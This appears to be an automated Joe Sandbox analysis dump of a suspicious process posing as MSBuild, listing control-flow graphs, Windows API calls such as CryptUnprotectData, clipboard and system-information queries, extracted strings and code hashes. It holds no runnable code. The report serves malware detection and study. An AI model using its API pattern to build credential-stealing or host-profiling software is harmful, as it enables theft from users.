GetComputerNameExA 482->485 484 426870-426879 483->484 484->484 486 42687b 484->486 487 426921-426928 485->487 488 4268d5 485->488 486->485 490 42692a-42692b 487->490 491 42693b-426949 487->491 489 4268e0-42691f 488->489 489->487 489->489 494 426930-426939 490->494 492 42695b-4269b9 491->492 493 42694b-42694f 491->493 497 4269f2-4269f9 492->497 498 4269bb 492->498 495 426950-426959 493->495 494->491 494->494 495->492 495->495 500 4269fb-426a02 497->500 501 426a1d 497->501 499 4269c0-4269f0 498->499 499->497 499->499 502 426a10-426a19 500->502 503 426a23-426a2b 501->503 502->502 504 426a1b 502->504 505 426a3b-426a99 call 43ae40 503->505 506 426a2d-426a2f 503->506 504->503 511 426a9b 505->511 512 426ab9-426ac0 505->512 508 426a30-426a39 506->508 508->505 508->508 513 426aa0-426ab7 511->513 514 426ac2-426ac3 512->514 515 426adb-426ae8 512->515 513->512 513->513 516 426ad0-426ad9 514->516 517 426b06-426b0f 515->517 516->515 516->516 518 426bb2-426bf9 517->518 519 426b15-426b1c 517->519 520 426bfb 518->520 521 426c3f-426c46 518->521 522 426af0-426af2 519->522 523 426b1e-426b37 519->523 524 426c00-426c3d 520->524 525 426c5b-426c60 call 42c010 521->525 526 426c48-426c49 521->526 527 426af7-426b00 522->527 528 426b70-426b78 523->528 529 426b39-426b3c 523->529 524->521 524->524 535 426c65-426c88 525->535 532 426c50-426c59 526->532 527->517 534 426bae-426bb0 527->534 528->527 531 426b7e-426ba9 528->531 529->528 530 426b3e-426b66 529->530 530->527 531->527 532->525 532->532 534->518
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: SVZQ
                                            • API String ID: 0-3438672366
                                            • Opcode ID: c7096b3c1dcda8451c8a58179f0c509e164c73ce21d76a298f677621a80a0ed4
                                            • Instruction ID: 86c0e0361f7d1bc27318b62b175c37bc8ba2617b118bb2386df6aa83aaa4c60b
                                            • Opcode Fuzzy Hash: c7096b3c1dcda8451c8a58179f0c509e164c73ce21d76a298f677621a80a0ed4
                                            • Instruction Fuzzy Hash: A632A0B06046918FE325CF29D4A0722BBF1FF57304F69859DD4C68B392D339A845CBA5

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 579 41c670-41c6ec 580 41c739-41c77c RtlExpandEnvironmentStrings 579->580 581 41c6ee-41c6ef 579->581 583 41c785 580->583 584 41c77e-41c783 580->584 582 41c6f0-41c737 581->582 582->580 582->582 585 41c788-41c7fa call 408710 RtlExpandEnvironmentStrings 583->585 584->585 588 41c843-41c870 585->588 589 41c7fc-41c7ff 585->589 590 41c872-41c877 588->590 591 41c879-41c87b 588->591 592 41c800-41c841 589->592 593 41c87e-41c88f call 408710 590->593 591->593 592->588 592->592 596 41c8b1-41c8c1 593->596 597 41c891-41c896 593->597 599 41c8e1-41c8f2 call 43ba80 596->599 600 41c8c3-41c8ca 596->600 598 41c8a0-41c8af 597->598 598->596 598->598 603 41c8f7-41c914 599->603 601 41c8d0-41c8df 600->601 601->599 601->601
                                            APIs
                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041C770
                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041C79B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: EnvironmentExpandStrings
                                            • String ID: BE
                                            • API String ID: 237503144-2233502311
                                            • Opcode ID: b37512823ed82f07eec402ac5ec63761c754146bd8c09e3361f71e39d7c7a991
                                            • Instruction ID: 7506d323152bd8169220679f0f180df36f1cb5ad2bea201e3c2e1baadad06111
                                            • Opcode Fuzzy Hash: b37512823ed82f07eec402ac5ec63761c754146bd8c09e3361f71e39d7c7a991
                                            • Instruction Fuzzy Hash: D061AB701083518BE724DF14C890BABB7E1FFC5704F148A1DE8DA9B285E7749949CBA6

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 604 43864a-43864f 605 438650-4386d9 call 43ae40 * 3 604->605 611 4386db 605->611 612 438709-43870f 605->612 613 4386e0-438707 611->613 615 4382a6-43833a call 43ae40 * 3 612->615 616 438715 612->616 613->612 613->613 623 438369-43836f LoadLibraryW 615->623 624 43833c-43833f 615->624 626 438290-4382a3 623->626 627 438375-43837a 623->627 625 438340-438367 624->625 625->623 625->625 627->604
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 17$17
                                            • API String ID: 0-4233266724
                                            • Opcode ID: bd68f39e99eeb81f2292b78e620a3f71e84a278828ca7f0afd4750123b6c6279
                                            • Instruction ID: 30bc7931dced1af7ac4c6f9d0434c346eff0a4b35e8b4806f2d22c0c74591460
                                            • Opcode Fuzzy Hash: bd68f39e99eeb81f2292b78e620a3f71e84a278828ca7f0afd4750123b6c6279
                                            • Instruction Fuzzy Hash: 4941AFB4540700CFDB14EF25EC91616BBE1FB0A310F14986DE8868AB26E73CE461CF59
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID: 17
                                            • API String ID: 1029625771-2050153417
                                            • Opcode ID: 407790e7f8f50104050cfca858ca54130e2f8b3d274ef5853e8c9fbaab5e0cb8
                                            • Instruction ID: a08a19d0897ef156bb44d491b506e6b1cdd0808cfb5648dc64a0ecc362562bcb
                                            • Opcode Fuzzy Hash: 407790e7f8f50104050cfca858ca54130e2f8b3d274ef5853e8c9fbaab5e0cb8
                                            • Instruction Fuzzy Hash: 5C219FB4640300CFD714EF25EC91616BBF1FB06315B14986ED8868BB26E738E462CF59
                                            APIs
                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 0041CFFB
                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0041D029
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: EnvironmentExpandStrings
                                            • String ID:
                                            • API String ID: 237503144-0
                                            • Opcode ID: 3312c03c78907f9166d939215c979b3fd95f8790b82ae46502f6c220606cde0d
                                            • Instruction ID: eb86117866d945d2705fe327d60a3420c56ddb441ac3f7b4156d7c824608bcd1
                                            • Opcode Fuzzy Hash: 3312c03c78907f9166d939215c979b3fd95f8790b82ae46502f6c220606cde0d
                                            • Instruction Fuzzy Hash: 97519CB41007009FE724CF19D880B16BBB1EF4A750F258A9DE9A55F7A6C731E842CF85
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415BAD
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: CryptDataUnprotect
                                            • String ID:
                                            • API String ID: 834300711-0
                                            • Opcode ID: a287517f34824a3bf384132246b69a47dfecdf06349c6df0b143b5d27b57d290
                                            • Instruction ID: 3a667ff3454842c785eb92ec6cb7f75f1e590c08ad6486e92f650cf018a2a703
                                            • Opcode Fuzzy Hash: a287517f34824a3bf384132246b69a47dfecdf06349c6df0b143b5d27b57d290
                                            • Instruction Fuzzy Hash: B571BEB15083818FD314CF28C48179BBBE2AFD5344F588A2EE1E987392D779D849CB56
                                            APIs
                                            • LdrInitializeThunk.NTDLL(0043BA5C,005C003F,00000006,?,?,00000018,00000E0F,?,CA), ref: 00438C76
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                            • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
                                            • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                            • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e980e8285af8cc75157b1f73a86491181f30e96f105d6a2d6b105177fd6976e5
                                            • Instruction ID: 2a082873a06e75f1109075f5a563285c9bf5a1c47b260c01c4965784b9fd4782
                                            • Opcode Fuzzy Hash: e980e8285af8cc75157b1f73a86491181f30e96f105d6a2d6b105177fd6976e5
                                            • Instruction Fuzzy Hash: 12F0D4755087418BC760EF25C54538FBBE0BBC8318F51C82DE88997395CBB5A8888F82

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 68 42a2ed-42a3cc 69 42a40e-42a445 SysAllocString 68->69 70 42a3ce 68->70 71 42a3d0-42a40a 70->71 71->71 72 42a40c 71->72 72->69
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: AllocString
                                            • String ID: !$#$%$'$)$*$+$-$9$;$=$?$B$D$H$I$K$P$e$i$k$z
                                            • API String ID: 2525500382-3880154102
                                            • Opcode ID: 7c2b0187cbf50d657652b52235cb37ac384dce932d34ce65bbe0c4b333584f6b
                                            • Instruction ID: b8eb1df4a728873e96e99503bd3c88436959daf62c36cc3e5a9d5f1745c9d864
                                            • Opcode Fuzzy Hash: 7c2b0187cbf50d657652b52235cb37ac384dce932d34ce65bbe0c4b333584f6b
                                            • Instruction Fuzzy Hash: 1031C37020D3C08EE336CA28D0583DBBFE25BA7308F48485DD5D94A282C7BA454A8767
                                            APIs
                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000), ref: 0041768D
                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?), ref: 004176C3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: EnvironmentExpandStrings
                                            • String ID: 2wE
                                            • API String ID: 237503144-3194401474
                                            • Opcode ID: 611003672a94f86da9f859a62908065673ae299162a2181766fdca5a6a383a15
                                            • Instruction ID: 10558a4b843bba572430d8d0774d4b44b46ff8c952e476b2c363e0d4f9f059a4
                                            • Opcode Fuzzy Hash: 611003672a94f86da9f859a62908065673ae299162a2181766fdca5a6a383a15
                                            • Instruction Fuzzy Hash: EA1142B4610A01AFD734DF29DC45A13BBF5EB85314F10861DF8A6877D0E770A8158BA5
                                            APIs
                                            Strings
                                            • primarily often on modified in or uses the on the play of is that eleet replacements leetspeak, ways other via used resemblance spellings similarity a internet. glyphs of it system or their character reflection, xrefs: 00408EA4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID: primarily often on modified in or uses the on the play of is that eleet replacements leetspeak, ways other via used resemblance spellings similarity a internet. glyphs of it system or their character reflection
                                            • API String ID: 621844428-744483612
                                            • Opcode ID: 31a9e0c74d747087b60decf9ced0de02774cc2f0ae10abf68d8517e2935416a2
                                            • Instruction ID: 98d979e8d1f8271b92ff5c640343200f4b3ab9cc7b8630f29497534f27368aaf
                                            • Opcode Fuzzy Hash: 31a9e0c74d747087b60decf9ced0de02774cc2f0ae10abf68d8517e2935416a2
                                            • Instruction Fuzzy Hash: 6BF06D7081870196CA503B75DB0622BBAA8AB51319F10003FE9C1B61D2EE7C481F57DF
                                            APIs
                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00427157
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InstalledMemoryPhysicallySystem
                                            • String ID: qOtJ
                                            • API String ID: 3960555810-1415300708
                                            • Opcode ID: 9ed80bf50477278f9efd2517d9f6c70f34fdd715102ec1273fab0711fe8b9f86
                                            • Instruction ID: ddd6f29b25ed8a156d44547f189f4453f4b89a07aab67fdeac9dbc7eff17720a
                                            • Opcode Fuzzy Hash: 9ed80bf50477278f9efd2517d9f6c70f34fdd715102ec1273fab0711fe8b9f86
                                            • Instruction Fuzzy Hash: 8FC1B474208291CFD729CF29D090726FBE2FF9A304F68859EC4D68B356C739A845CB95
                                            APIs
                                            • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00434DDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InformationVolume
                                            • String ID: \
                                            • API String ID: 2039140958-2967466578
                                            • Opcode ID: 4546e5f721cf610e40f90ca39cb59e7a4eff62814b5b94167e1f257b6d9815e8
                                            • Instruction ID: 829a4678ba2dd3dd1dd258350cb19a37661fe774dcfee8343bee9cc87edc43db
                                            • Opcode Fuzzy Hash: 4546e5f721cf610e40f90ca39cb59e7a4eff62814b5b94167e1f257b6d9815e8
                                            • Instruction Fuzzy Hash: 45E04FB93D03007BF3286B10EC13F1A36A9A742745F21442DB292A91D0DAB868148E1E
                                            APIs
                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 0041479A
                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 004147C8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: EnvironmentExpandStrings
                                            • String ID:
                                            • API String ID: 237503144-0
                                            • Opcode ID: e230bcd44a9ef06a4679c11cbee609a99fa6bc0358a8576fb67d8b2b3ef182a1
                                            • Instruction ID: 1fb4d0208cb9fa11ff189c5681080f3e46b158539fa05021a27b0e744d6e87e9
                                            • Opcode Fuzzy Hash: e230bcd44a9ef06a4679c11cbee609a99fa6bc0358a8576fb67d8b2b3ef182a1
                                            • Instruction Fuzzy Hash: CD5116746043008BE724DF28C851BABB7E5EFC6314F144A1DF5A59B2E0D778D940CB96
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 2faea0725e2eebb87ed941b92f977c344c4d66512c1914c53b0c763caac228fa
                                            • Instruction ID: f595093ba3ee5e2bfc91a55b90ed065bea1f94f217125e9baa9df7d93a4c3890
                                            • Opcode Fuzzy Hash: 2faea0725e2eebb87ed941b92f977c344c4d66512c1914c53b0c763caac228fa
                                            • Instruction Fuzzy Hash: C5312A78205B43AFD3188F15C890626FBB1BB89310F548A2DD5A647F54C738B552DB94
                                            APIs
                                            • LoadLibraryW.KERNELBASE(?), ref: 0043846B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: c9c171ccbaa7ff9692fad9a1cc99a9c878355d12e0fe0630b41d1474ca663176
                                            • Instruction ID: 0c318ffcca8c1767b0691d815b4a2294eeff893780b6ede518a40f363c11d7dd
                                            • Opcode Fuzzy Hash: c9c171ccbaa7ff9692fad9a1cc99a9c878355d12e0fe0630b41d1474ca663176
                                            • Instruction Fuzzy Hash: 0321CAB42417828BDB18DF61D9E07177BA2FF5A304F18846CC8864FB6ADB34E844CB58
                                            APIs
                                            • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00438C20
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: 257f412e89414fd8022ce49eed0758758a6bb88dae10292fc8be644715a8f883
                                            • Instruction ID: 26a556e0a76d1831cfaeaa6d4ec2c14a841e2878affb252de8711885f3e51e29
                                            • Opcode Fuzzy Hash: 257f412e89414fd8022ce49eed0758758a6bb88dae10292fc8be644715a8f883
                                            • Instruction Fuzzy Hash: 570186342457808FD3218B18C990596FBF1FF0B710B04999AE5A687A63C335EC42CB54
                                            APIs
                                            • RtlFreeHeap.NTDLL(?,00000000), ref: 00436C1D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 6c7dda4a9d97658a560d616a13542526ba0bf4958f38e2e2407e4ce80cc50cda
                                            • Instruction ID: f9683c714a6a61c0c86dd095972dc8c1d8a34eac03989d1e39b029178cef77ab
                                            • Opcode Fuzzy Hash: 6c7dda4a9d97658a560d616a13542526ba0bf4958f38e2e2407e4ce80cc50cda
                                            • Instruction Fuzzy Hash: B1C01231100205EBCA14DB80EC20AA47725E744315F100069E509425A0C6315921DA40
                                            APIs
                                            • RtlAllocateHeap.NTDLL(?,00000000), ref: 00436AE6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: cc64c9807242cd09c9b96dbdd0e7a29bbe2467af3302191d983f3715906f0d60
                                            • Instruction ID: 16a40d57eba595d07e25bbb04b4e71a8b8b95c49ad386cb0a1e0a24629cb0d6c
                                            • Opcode Fuzzy Hash: cc64c9807242cd09c9b96dbdd0e7a29bbe2467af3302191d983f3715906f0d60
                                            • Instruction Fuzzy Hash: 27B0127B74010464DA2022987C01BED731CC7C0132F000063E70891040412151240160
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: Clipboard$CloseDataLongOpenWindow
                                            • String ID: G$m
                                            • API String ID: 1647500905-1216331284
                                            • Opcode ID: 0d520eccc92950579300fb5ad5db98749033eafb1dabe1e8f9681f288c9d97b8
                                            • Instruction ID: ba54923a1079b641d482b0bf98d98a5b523b471b8413af55b5e8fd8f019fe5b5
                                            • Opcode Fuzzy Hash: 0d520eccc92950579300fb5ad5db98749033eafb1dabe1e8f9681f288c9d97b8
                                            • Instruction Fuzzy Hash: DF617074508781CFC720DF38D585616BBF1AF16324F548AADE4D58B392D335A806CBA6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 5U&S$;I9W$OvNG$R^CH$b&B
                                            • API String ID: 0-2234602376
                                            • Opcode ID: 00cd649e7659d794f7ca12f17f82c337af901bf662b709bdccf46a1003a70bb2
                                            • Instruction ID: f7e0fbace6299427b8793592d0a3ba05104fb58289f48f2c3e33420b4ced35e1
                                            • Opcode Fuzzy Hash: 00cd649e7659d794f7ca12f17f82c337af901bf662b709bdccf46a1003a70bb2
                                            • Instruction Fuzzy Hash: 3CF1ADB06083509FD324CF29D89072BBBE1FFCA314F55892DE99987391CB799845CB86
                                            APIs
                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 00411BE4
                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 00411C1A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: EnvironmentExpandStrings
                                            • String ID: /QD$b
                                            • API String ID: 237503144-3552961473
                                            • Opcode ID: ed57fe06c902b3b6249c39f3fa634217b23a3aaf49a3cb7b691522c9f8e86489
                                            • Instruction ID: 7a871bc545a4812b2f67ea8769ad65d1a29418481b0f0278322f73e1f015946f
                                            • Opcode Fuzzy Hash: ed57fe06c902b3b6249c39f3fa634217b23a3aaf49a3cb7b691522c9f8e86489
                                            • Instruction Fuzzy Hash: 39D17C745193808FE3B4CF14C884BEFB7E9AF89715F14482EE48887391DB789885CB56
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: Object$DeleteMetricsSelectSystem
                                            • String ID:
                                            • API String ID: 3911056724-3916222277
                                            • Opcode ID: 5954fd384bcccd35ae812532578bd36b2eb7eb600e9f84f9b1fd4c31eb2a23c0
                                            • Instruction ID: 377d0be6162d44d5f37c758a093b900a424e6b451a4d6c73318832d57b066feb
                                            • Opcode Fuzzy Hash: 5954fd384bcccd35ae812532578bd36b2eb7eb600e9f84f9b1fd4c31eb2a23c0
                                            • Instruction Fuzzy Hash: 26917AB4A04B00DFC750EF29D595A1ABBF0FB49300F10896DE99ACB360D731A849CF92
                                            APIs
                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000006,?,00000200,?), ref: 0041204C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: EnvironmentExpandStrings
                                            • String ID: VD
                                            • API String ID: 237503144-2036460487
                                            • Opcode ID: 658a2b22f3fd0e536ad209e82ee58846eda13c2583f5e0e0d9e4fe231bfa25ca
                                            • Instruction ID: 9e45f8f0a49f52eb72c9d7ab643889174a9a9dce60aabbbf0de66af8cf0b0dce
                                            • Opcode Fuzzy Hash: 658a2b22f3fd0e536ad209e82ee58846eda13c2583f5e0e0d9e4fe231bfa25ca
                                            • Instruction Fuzzy Hash: 09517F702183818AE764CF04C890BDBB7F5EFC6344F14892DE589CB2A1DBB49486CB5A